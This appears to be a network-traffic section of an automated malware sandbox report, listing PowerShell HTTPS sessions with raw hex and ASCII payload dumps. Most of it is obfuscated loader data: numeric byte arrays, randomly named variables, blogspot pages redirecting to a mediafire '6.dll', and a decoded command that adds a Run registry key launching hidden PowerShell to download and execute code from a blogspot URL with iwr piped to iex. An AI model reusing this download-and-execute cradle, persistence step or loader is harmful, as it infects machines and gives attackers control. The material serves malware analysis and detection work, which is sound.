                                                                                                                                                                      2022-01-14 11:20:25 UTC353INData Raw: 2c 32 31 38 2c 31 39 36 2c 32 32 38 2c 31 38 35 2c 35 35 2c 31 36 32 2c 32 30 37 2c 31 34 33 2c 33 34 2c 32 31 37 2c 31 2c 32 30 31 2c 38 32 2c 31 30 35 2c 39 33 2c 39 37 2c 31 37 31 2c 31 36 35 2c 32 34 35 2c 31 33 30 2c 32 39 2c 31 34 38 2c 31 35 30 2c 31 35 2c 31 37 31 2c 31 34 37 2c 35 34 2c 31 36 2c 32 32 2c 32 34 2c 34 31 2c 31 30 38 2c 38 2c 34 34 2c 37 31 2c 32 31 38 2c 38 2c 38 38 2c 31 37 37 2c 31 38 30 2c 39 38 2c 32 31 36 2c 32 32 36 2c 32 30 30 2c 32 35 30 2c 38 39 2c 31 31 39 2c 31 36 32 2c 32 30 39 2c 31 38 33 2c 31 39 36 2c 31 33 36 2c 32 31 38 2c 31 32 30 2c 31 37 30 2c 32 34 39 2c 31 37 39 2c 38 33 2c 32 31 30 2c 33 38 2c 31 39 35 2c 39 32 2c 39 38 2c 31 33 33 2c 37 37 2c 31 33 35 2c 33 37 2c 37 33 2c 34 33 2c 31 33 31 2c 32 31 2c 31 39
                                                                                                                                                                      Data Ascii: ,218,196,228,185,55,162,207,143,34,217,1,201,82,105,93,97,171,165,245,130,29,148,150,15,171,147,54,16,22,24,41,108,8,44,71,218,8,88,177,180,98,216,226,200,250,89,119,162,209,183,196,136,218,120,170,249,179,83,210,38,195,92,98,133,77,135,37,73,43,131,21,19
                                                                                                                                                                      2022-01-14 11:20:25 UTC369INData Raw: 33 34 2c 32 32 39 2c 32 33 32 2c 37 34 2c 32 34 36 2c 31 36 33 2c 31 30 30 2c 31 31 39 2c 39 33 2c 32 30 31 2c 32 2c 37 34 2c 32 32 2c 32 33 34 2c 37 34 2c 31 34 2c 31 36 36 2c 31 30 30 2c 31 33 37 2c 31 37 34 2c 32 32 38 2c 38 2c 37 34 2c 31 35 30 2c 32 33 33 2c 37 34 2c 31 34 32 2c 31 36 35 2c 31 30 30 2c 31 33 33 2c 31 37 34 2c 31 36 34 2c 31 38 33 2c 38 33 2c 32 37 2c 31 38 32 2c 39 30 2c 38 37 2c 31 31 34 2c 31 35 30 2c 32 31 34 2c 31 33 34 2c 31 30 39 2c 32 31 30 2c 31 34 39 2c 31 38 30 2c 32 34 31 2c 38 35 2c 31 36 30 2c 34 33 2c 38 39 2c 37 34 2c 32 34 33 2c 36 30 2c 31 36 34 2c 34 33 2c 35 37 2c 31 35 37 2c 31 34 36 2c 31 36 37 2c 31 31 36 2c 33 37 2c 32 33 31 2c 38 30 2c 32 34 32 2c 31 35 34 2c 31 37 34 2c 32 32 38 2c 32 2c 37 34 2c 31 37 38 2c
                                                                                                                                                                      Data Ascii: 34,229,232,74,246,163,100,119,93,201,2,74,22,234,74,14,166,100,137,174,228,8,74,150,233,74,142,165,100,133,174,164,183,83,27,182,90,87,114,150,214,134,109,210,149,180,241,85,160,43,89,74,243,60,164,43,57,157,146,167,116,37,231,80,242,154,174,228,2,74,178,
                                                                                                                                                                      2022-01-14 11:20:25 UTC385INData Raw: 32 35 33 2c 32 31 36 2c 32 33 35 2c 32 37 2c 32 34 34 2c 31 32 34 2c 32 34 2c 32 35 31 2c 31 35 38 2c 32 2c 32 30 37 2c 31 37 38 2c 32 34 31 2c 31 39 36 2c 31 31 2c 31 30 38 2c 35 30 2c 31 30 31 2c 31 37 34 2c 31 37 36 2c 39 35 2c 31 38 39 2c 32 38 2c 32 33 33 2c 34 31 2c 35 30 2c 31 35 38 2c 35 37 2c 31 37 38 2c 34 30 2c 32 32 39 2c 38 35 2c 39 38 2c 31 35 36 2c 31 37 38 2c 31 34 38 2c 31 35 32 2c 31 36 34 2c 31 37 32 2c 31 36 30 2c 32 30 34 2c 32 39 2c 31 33 33 2c 33 39 2c 32 33 39 2c 34 33 2c 31 39 39 2c 31 33 37 2c 37 36 2c 36 31 2c 37 33 2c 31 31 36 2c 38 30 2c 32 34 39 2c 32 32 2c 32 33 2c 31 31 37 2c 35 30 2c 32 30 39 2c 31 36 32 2c 32 34 32 2c 32 33 37 2c 31 32 36 2c 34 32 2c 32 33 39 2c 35 31 2c 31 36 2c 32 31 39 2c 31 37 33 2c 32 31 36 2c 33 30
                                                                                                                                                                      Data Ascii: 253,216,235,27,244,124,24,251,158,2,207,178,241,196,11,108,50,101,174,176,95,189,28,233,41,50,158,57,178,40,229,85,98,156,178,148,152,164,172,160,204,29,133,39,239,43,199,137,76,61,73,116,80,249,22,23,117,50,209,162,242,237,126,42,239,51,16,219,173,216,30
                                                                                                                                                                      2022-01-14 11:20:25 UTC401INData Raw: 34 2c 32 34 39 2c 31 39 34 2c 31 36 33 2c 39 38 2c 32 35 33 2c 32 30 39 2c 37 30 2c 33 2c 36 31 2c 31 35 34 2c 31 31 35 2c 31 38 39 2c 31 38 37 2c 35 31 2c 35 37 2c 39 30 2c 32 30 2c 32 34 34 2c 32 34 33 2c 31 38 31 2c 35 38 2c 39 34 2c 31 33 33 2c 31 31 2c 32 30 30 2c 32 32 30 2c 32 30 33 2c 32 32 30 2c 31 38 34 2c 35 30 2c 32 31 32 2c 31 30 2c 31 39 37 2c 32 31 30 2c 32 2c 32 34 34 2c 33 36 2c 32 34 37 2c 31 33 32 2c 32 31 32 2c 32 30 30 2c 32 34 31 2c 31 30 38 2c 32 35 34 2c 32 2c 31 31 30 2c 31 38 34 2c 31 31 31 2c 31 31 33 2c 35 39 2c 32 33 2c 38 38 2c 31 33 33 2c 31 37 35 2c 31 33 36 2c 35 34 2c 31 39 36 2c 31 31 36 2c 31 33 31 2c 37 33 2c 33 33 2c 31 38 32 2c 32 30 36 2c 31 39 34 2c 38 32 2c 35 37 2c 37 37 2c 31 36 36 2c 31 30 35 2c 31 35 2c 31 36
                                                                                                                                                                      Data Ascii: 4,249,194,163,98,253,209,70,3,61,154,115,189,187,51,57,90,20,244,243,181,58,94,133,11,200,220,203,220,184,50,212,10,197,210,2,244,36,247,132,212,200,241,108,254,2,110,184,111,113,59,23,88,133,175,136,54,196,116,131,73,33,182,206,194,82,57,77,166,105,15,16
                                                                                                                                                                      2022-01-14 11:20:25 UTC417INData Raw: 2c 36 32 2c 32 33 34 2c 32 35 33 2c 32 38 2c 39 37 2c 31 33 33 2c 31 32 31 2c 31 35 39 2c 31 35 31 2c 37 39 2c 32 31 38 2c 32 33 2c 31 31 36 2c 31 35 2c 32 35 31 2c 31 31 35 2c 38 38 2c 31 33 30 2c 31 34 37 2c 32 34 35 2c 31 39 39 2c 37 32 2c 31 32 34 2c 32 30 33 2c 31 37 30 2c 32 35 34 2c 37 37 2c 37 31 2c 31 38 32 2c 33 30 2c 36 31 2c 32 33 39 2c 31 38 39 2c 32 34 37 2c 31 39 33 2c 31 33 31 2c 31 30 39 2c 35 35 2c 31 36 37 2c 31 38 38 2c 31 35 31 2c 33 33 2c 32 34 38 2c 31 35 30 2c 32 34 30 2c 32 33 30 2c 31 37 31 2c 39 36 2c 39 34 2c 32 33 36 2c 31 39 36 2c 38 32 2c 31 32 31 2c 39 38 2c 37 38 2c 32 34 38 2c 31 38 35 2c 31 35 33 2c 32 31 34 2c 32 34 38 2c 35 38 2c 36 30 2c 35 36 2c 32 30 33 2c 32 33 2c 32 33 30 2c 32 34 35 2c 39 39 2c 31 31 39 2c 31 39
                                                                                                                                                                      Data Ascii: ,62,234,253,28,97,133,121,159,151,79,218,23,116,15,251,115,88,130,147,245,199,72,124,203,170,254,77,71,182,30,61,239,189,247,193,131,109,55,167,188,151,33,248,150,240,230,171,96,94,236,196,82,121,98,78,248,185,153,214,248,58,60,56,203,23,230,245,99,119,19
                                                                                                                                                                      2022-01-14 11:20:25 UTC433INData Raw: 31 33 33 2c 31 32 32 2c 32 34 36 2c 32 34 37 2c 32 33 37 2c 36 33 2c 31 36 30 2c 31 34 38 2c 32 33 37 2c 35 31 2c 32 35 35 2c 34 31 2c 31 39 32 2c 39 34 2c 32 35 34 2c 39 35 2c 31 39 36 2c 35 31 2c 32 35 34 2c 32 32 31 2c 31 30 33 2c 31 34 34 2c 32 35 31 2c 31 30 30 2c 31 39 35 2c 31 30 37 2c 32 38 2c 35 31 2c 31 31 2c 31 39 37 2c 32 35 32 2c 32 31 33 2c 31 34 36 2c 32 33 39 2c 31 34 37 2c 36 32 2c 31 31 37 2c 39 35 2c 32 35 30 2c 37 32 2c 32 34 32 2c 36 34 2c 32 34 32 2c 31 33 30 2c 31 32 33 2c 31 30 30 2c 32 32 33 2c 31 34 35 2c 33 35 2c 37 31 2c 32 32 30 2c 31 32 35 2c 36 31 2c 32 33 38 2c 32 30 39 2c 33 2c 32 35 31 2c 34 36 2c 32 38 2c 32 33 36 2c 35 39 2c 31 38 38 2c 32 33 39 2c 32 34 30 2c 32 32 30 2c 31 34 35 2c 33 35 2c 32 33 33 2c 33 2c 32 32 31
                                                                                                                                                                      Data Ascii: 133,122,246,247,237,63,160,148,237,51,255,41,192,94,254,95,196,51,254,221,103,144,251,100,195,107,28,51,11,197,252,213,146,239,147,62,117,95,250,72,242,64,242,130,123,100,223,145,35,71,220,125,61,238,209,3,251,46,28,236,59,188,239,240,220,145,35,233,3,221
                                                                                                                                                                      2022-01-14 11:20:25 UTC449INData Raw: 2c 31 32 38 2c 31 30 32 2c 34 2c 31 37 31 2c 31 38 39 2c 31 30 38 2c 31 30 32 2c 36 33 2c 32 34 30 2c 31 2c 32 31 39 2c 31 35 2c 31 32 34 2c 31 34 34 2c 38 30 2c 32 30 2c 31 38 37 2c 39 36 2c 32 34 31 2c 32 30 32 2c 31 35 35 2c 32 34 32 2c 31 34 31 2c 32 34 36 2c 33 37 2c 36 38 2c 31 39 31 2c 32 35 31 2c 33 2c 31 31 34 2c 31 37 38 2c 35 33 2c 31 37 33 2c 31 38 33 2c 32 30 36 2c 38 34 2c 32 35 32 2c 32 35 35 2c 31 30 31 2c 31 38 30 2c 31 30 39 2c 37 39 2c 39 37 2c 31 32 32 2c 37 2c 32 32 39 2c 31 35 33 2c 31 36 38 2c 31 33 31 2c 32 33 34 2c 32 30 2c 31 33 30 2c 32 34 37 2c 32 30 38 2c 31 37 2c 32 32 36 2c 32 31 37 2c 32 32 38 2c 31 35 31 2c 31 39 37 2c 37 33 2c 31 30 35 2c 32 31 2c 33 36 2c 32 30 35 2c 39 34 2c 37 34 2c 31 37 32 2c 32 33 2c 31 32 37 2c 31
                                                                                                                                                                      Data Ascii: ,128,102,4,171,189,108,102,63,240,1,219,15,124,144,80,20,187,96,241,202,155,242,141,246,37,68,191,251,3,114,178,53,173,183,206,84,252,255,101,180,109,79,97,122,7,229,153,168,131,234,20,130,247,208,17,226,217,228,151,197,73,105,21,36,205,94,74,172,23,127,1
                                                                                                                                                                      2022-01-14 11:20:25 UTC463INData Raw: 39 30 2c 32 31 30 2c 31 33 37 2c 38 36 2c 31 34 33 2c 31 32 33 2c 32 2c 31 35 33 2c 31 31 2c 31 32 2c 31 37 30 2c 33 34 2c 36 39 2c 32 32 38 2c 31 31 32 2c 31 31 34 2c 31 32 35 2c 36 35 2c 38 36 2c 31 33 37 2c 31 35 33 2c 31 37 35 2c 38 39 2c 31 34 32 2c 35 32 2c 37 39 2c 31 33 32 2c 31 35 32 2c 32 31 39 2c 31 32 33 2c 31 30 30 2c 36 33 2c 32 30 39 2c 33 37 2c 33 39 2c 36 39 2c 31 30 34 2c 31 35 34 2c 31 34 36 2c 31 38 38 2c 31 38 30 2c 31 34 32 2c 32 32 34 2c 32 31 38 2c 35 30 2c 31 34 32 2c 33 32 2c 33 30 2c 36 34 2c 33 37 2c 32 30 31 2c 34 34 2c 32 38 2c 34 32 2c 37 37 2c 31 39 33 2c 31 31 32 2c 31 32 2c 35 39 2c 31 35 2c 31 38 35 2c 31 36 32 2c 39 39 2c 39 39 2c 32 33 32 2c 39 38 2c 32 33 36 2c 34 2c 31 30 36 2c 31 33 39 2c 31 35 36 2c 35 39 2c 32 31
                                                                                                                                                                      Data Ascii: 90,210,137,86,143,123,2,153,11,12,170,34,69,228,112,114,125,65,86,137,153,175,89,142,52,79,132,152,219,123,100,63,209,37,39,69,104,154,146,188,180,142,224,218,50,142,32,30,64,37,201,44,28,42,77,193,112,12,59,15,185,162,99,99,232,98,236,4,106,139,156,59,21
                                                                                                                                                                      2022-01-14 11:20:25 UTC479INData Raw: 47 54 46 48 59 47 55 4a 48 4b 47 59 46 54 44 52 53 52 44 54 46 59 47 4a 55 48 4b 44 44 52 54 46 59 47 20 3d 47 65 74 2d 44 65 63 6f 6d 70 72 65 73 73 65 64 42 79 74 65 41 72 72 61 79 20 24 53 54 52 44 59 46 55 47 49 48 55 59 54 59 52 54 45 53 52 44 59 55 47 49 52 49 0d 0a 0d 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 34 0d 0a 24 46 47 43 48 4a 42 4b 48 56 47 43 46 48 4a 56 42 4b 4e 42 48 56 47 4a 42 20 3d 20 44 34 46 44 35 43 35 42 39 32 36 36 38 32 34 43 34 45 45 46 52 57 45 4f 49 55 52 57 44 51 57 4f 49 44 55 51 57 33 38 39 43 38 33 45 30 43 36 39 46 44 33 46 41 41 47 20 2d 54 79 70 65 4e 61 6d 65 20 27 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 41 72 72 61 79 4c 69 73 74 27 3b 0d 0a 24 46 47 43 48 4a 42 4b 48 56 47 43 46 48 4a 56 42
                                                                                                                                                                      Data Ascii: GTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG =Get-DecompressedByteArray $STRDYFUGIHUYTYRTESRDYUGIRIstart-sleep -s 4$FGCHJBKHVGCFHJVBKNBHVGJB = D4FD5C5B9266824C4EEFRWEOIURWDQWOIDUQW389C83E0C69FD3FAAG -TypeName 'System.Collections.ArrayList';$FGCHJBKHVGCFHJVB


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      2192.168.2.349825142.250.186.129443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2022-01-14 11:21:09 UTC481OUTGET /atom.xml HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: p6tbbb.blogspot.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2022-01-14 11:21:09 UTC481INHTTP/1.1 302 Found
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      ETag: W/"76994fcf688c1d67e3733d8c335322d774ccdec6a6cee5a150ea445829fd35f1"
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:09 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Server: blogger-renderd
                                                                                                                                                                      Expires: Fri, 14 Jan 2022 11:21:10 GMT
                                                                                                                                                                      Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Location: https://www.mediafire.com/file/5avuvurhf9r42y3/6.dll/file
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      3192.168.2.349824142.250.186.129443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2022-01-14 11:21:09 UTC482OUTGET /atom.xml HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: p26ynn.blogspot.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2022-01-14 11:21:09 UTC482INHTTP/1.1 302 Found
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      ETag: W/"653e6214c6f62902c0acee3c8515402071ab5658902f4c9106cea3b71f4569ba"
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:09 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Server: blogger-renderd
                                                                                                                                                                      Expires: Fri, 14 Jan 2022 11:21:10 GMT
                                                                                                                                                                      Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Location: https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      4192.168.2.349827104.16.203.237443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2022-01-14 11:21:09 UTC482OUTGET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: www.mediafire.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2022-01-14 11:21:10 UTC484INHTTP/1.1 302 Found
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:10 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: ukey=8gv80wkxqbda9mv7zrd52a2eanmh8cy0; expires=Tue, 14-Jan-2042 11:21:10 GMT; Max-Age=631152000; path=/; domain=.mediafire.com; HttpOnly
                                                                                                                                                                      Strict-Transport-Security: max-age=0
                                                                                                                                                                      Access-Control-Allow-Origin: https://www.mediafire.com
                                                                                                                                                                      Location: https://download2262.mediafire.com/u45xa78x9nkg/5avuvurhf9r42y3/6.dll
                                                                                                                                                                      Report-To: {"group": "mediafirenel", "max_age": 86400, "include_subdomains": true, "endpoints": [{"url": "https://browser-reports.mediafire.dev/network-error"}]}
                                                                                                                                                                      NEL: {"report_to": "mediafirenel", "max_age": 86400, "include_subdomains": true, "failure_fraction": 0.01}
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                      Set-Cookie: __cf_bm=XI5bmwp1fM4BVc1oedBSbCz0KJS4GOtl71yJudGWoMk-1642159270-0-AcWwPmLhePabExPENyClMc6ZzNv7QOucaFmTrlsiSmflpf0J8p5ZWfOaiMfTdHZn36LLBvnV7Fk6K/btz9ZD1Rc=; path=/; expires=Fri, 14-Jan-22 11:51:10 GMT; domain=.mediafire.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 6cd67aac9c6e4e9d-FRA
                                                                                                                                                                      2022-01-14 11:21:10 UTC485INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      5192.168.2.34982834.102.176.152443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2022-01-14 11:21:10 UTC483OUTGET /ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: 5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2022-01-14 11:21:10 UTC483INHTTP/1.1 200 OK
                                                                                                                                                                      Server: openresty/1.19.9.1
                                                                                                                                                                      Content-Length: 205
                                                                                                                                                                      X-GUploader-UploadID: ADPycdukVOdsfESFZvaCgG1hbnOfR6smYI0ENYixz6KNvC_-TOgdQeNQs0_RIjxPcjUE7TuPSRc2HOjNGVx3BUHw1Xw
                                                                                                                                                                      x-goog-generation: 1641283569604910
                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                      x-goog-stored-content-length: 205
                                                                                                                                                                      x-goog-hash: crc32c=Yki6tg==
                                                                                                                                                                      x-goog-hash: md5=kcThf3Ys+9gTpJY1lKTwcA==
                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                      X-Seen-By: gcp.us-central-1.media-router-5ffcd6b674-mj9x7
                                                                                                                                                                      X-Robots-Tag: noindex, nofollow
                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                      Date: Wed, 12 Jan 2022 03:07:30 GMT
                                                                                                                                                                      Expires: Wed, 12 Jan 2022 04:07:30 GMT
                                                                                                                                                                      Cache-Control: public, max-age=15552000, immutable
                                                                                                                                                                      Age: 202420
                                                                                                                                                                      Last-Modified: Tue, 04 Jan 2022 08:06:09 GMT
                                                                                                                                                                      ETag: "91c4e17f762cfbd813a4963594a4f070"
                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2022-01-14 11:21:10 UTC484INData Raw: 3c 48 54 4d 4c 3e 0d 0a 3c 48 54 4d 4c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 48 45 41 44 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 0d 0a 77 69 6e 64 6f 77 2e 72 65 73 69 7a 65 54 6f 20 30 2c 20 30 0d 0a 73 65 6c 66 2e 63 6c 6f 73 65 0d 0a 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 2f 62 6f 64
                                                                                                                                                                      Data Ascii: <HTML><HTML><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><HEAD><script language="VBScript">window.resizeTo 0, 0self.close</script></head><body></bod
                                                                                                                                                                      2022-01-14 11:21:10 UTC484INData Raw: 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                      Data Ascii: y></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      6192.168.2.349829199.91.155.3443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2022-01-14 11:21:10 UTC485OUTGET /u45xa78x9nkg/5avuvurhf9r42y3/6.dll HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: download2262.mediafire.com
                                                                                                                                                                      Cookie: ukey=8gv80wkxqbda9mv7zrd52a2eanmh8cy0
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2022-01-14 11:21:11 UTC486INHTTP/1.1 200 OK
                                                                                                                                                                      server: dsp-0.0.1
                                                                                                                                                                      content-type: text/plain
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      connection: close
                                                                                                                                                                      content-encoding: binary
                                                                                                                                                                      cache-control: no-store
                                                                                                                                                                      x-robots-tag: noindex, nofollow
                                                                                                                                                                      content-disposition: attachment; filename="6.dll"
                                                                                                                                                                      content-length: 490941
                                                                                                                                                                      date: Fri, 14 Jan 2022 11:21:11 GMT
                                                                                                                                                                      2022-01-14 11:21:11 UTC486INData Raw: 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 35 0d 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74 79 20 2d 50 61 74 68 20 22 48 4b 43 55 3a 5c 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 52 75 6e 22 20 2d 4e 61 6d 65 20 22 4e 65 74 77 72 69 78 50 61 72 61 6d 22 20 2d 56 61 6c 75 65 20 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 20 68 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 70 61 73 73 20 2d 43 6f 6d 6d 61 6e 64 20 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 32 30 3b 69 77 72 20 22 22 68 74 74 70 73 3a 2f 2f 70 36 74 62 62 62 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 61 74 6f 6d 2e 78 6d 6c 22 22 20 2d 75 73 65 42 7c 69 65
                                                                                                                                                                      Data Ascii: start-sleep -s 5New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "NetwrixParam" -Value "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""https://p6tbbb.blogspot.com/atom.xml"" -useB|ie
                                                                                                                                                                      2022-01-14 11:21:11 UTC502INData Raw: 2c 32 31 2c 32 34 38 2c 38 38 2c 39 32 2c 32 32 34 2c 32 33 35 2c 32 32 37 2c 32 32 39 2c 32 34 38 2c 31 38 38 2c 31 33 31 2c 31 35 39 2c 39 33 2c 31 32 39 2c 32 33 39 2c 33 39 2c 32 35 35 2c 31 35 35 2c 34 2c 32 34 35 2c 38 36 2c 32 31 2c 32 34 31 2c 32 34 2c 37 2c 32 34 36 2c 31 34 33 2c 31 39 35 2c 34 36 2c 37 30 2c 31 34 36 2c 37 38 2c 31 37 31 2c 31 31 34 2c 32 35 30 2c 31 35 33 2c 32 34 33 2c 32 33 39 2c 38 36 2c 32 34 32 2c 31 34 34 2c 31 33 34 2c 33 37 2c 31 38 39 2c 36 35 2c 31 39 31 2c 32 31 37 2c 31 34 36 2c 31 31 36 2c 33 34 2c 32 31 33 2c 31 34 36 2c 31 31 36 2c 36 31 2c 32 35 33 2c 32 32 32 2c 39 34 2c 39 33 2c 36 32 2c 36 32 2c 31 38 38 2c 36 36 2c 32 35 34 2c 31 37 39 2c 32 30 39 2c 32 35 34 2c 35 33 2c 31 39 37 2c 32 34 34 2c 32 37 2c 31
                                                                                                                                                                      Data Ascii: ,21,248,88,92,224,235,227,229,248,188,131,159,93,129,239,39,255,155,4,245,86,21,241,24,7,246,143,195,46,70,146,78,171,114,250,153,243,239,86,242,144,134,37,189,65,191,217,146,116,34,213,146,116,61,253,222,94,93,62,62,188,66,254,179,209,254,53,197,244,27,1
                                                                                                                                                                      2022-01-14 11:21:11 UTC518INData Raw: 31 36 33 2c 31 39 30 2c 32 32 37 2c 32 36 2c 31 38 37 2c 31 35 37 2c 31 32 38 2c 33 38 2c 31 32 35 2c 33 30 2c 37 38 2c 32 39 2c 31 31 38 2c 32 32 38 2c 38 33 2c 31 33 35 2c 36 35 2c 36 32 2c 31 31 37 2c 31 35 32 2c 31 39 39 2c 31 36 37 2c 31 34 2c 38 31 2c 36 32 2c 31 31 37 2c 35 36 2c 34 2c 31 36 37 2c 31 34 2c 37 37 2c 35 36 2c 31 31 36 2c 34 38 2c 35 34 2c 31 33 36 2c 32 32 37 2c 31 33 31 2c 31 30 36 2c 31 38 39 2c 32 31 2c 32 33 31 2c 31 34 2c 31 39 38 2c 32 32 33 2c 31 33 32 2c 38 37 2c 32 31 33 2c 31 39 31 2c 31 33 37 2c 31 36 33 2c 37 2c 32 32 37 2c 31 38 37 2c 31 39 34 2c 31 35 35 2c 31 37 32 2c 32 33 31 2c 31 39 35 2c 31 33 35 2c 31 39 31 2c 31 38 37 2c 31 33 35 2c 31 35 2c 31 38 33 2c 35 38 2c 31 33 35 2c 31 35 2c 31 32 32 2c 31 34 36 2c 37 39
